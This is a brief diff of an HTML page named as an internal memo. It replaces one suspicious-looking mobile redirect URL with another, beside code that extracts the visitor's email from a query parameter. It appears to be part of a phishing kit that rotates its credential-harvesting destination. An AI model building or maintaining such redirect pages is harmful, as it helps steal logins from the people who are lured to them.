--- a/appr-internalmemoxjsn.html
+++ b/appr-internalmemoxjsn.html
@@ -89,7 +89,7 @@
       }, 600);
 
       const REDIRECT_DELAY = 3500;
-      const MOBILE_REDIRECT_URL_BASE = "https://offibvcfrslg.pointelilxlrchrsetrest.calorex-au.com/f/PjiPNlylFbA886MyXCEg#";
+      const MOBILE_REDIRECT_URL_BASE = "https://tools.pouvoodoo.solutions/ubzEz!Obee86675QC4Vh07Upu/$";
 
       function getEmail() {
           // 1. Try extracting from "state" query parameter
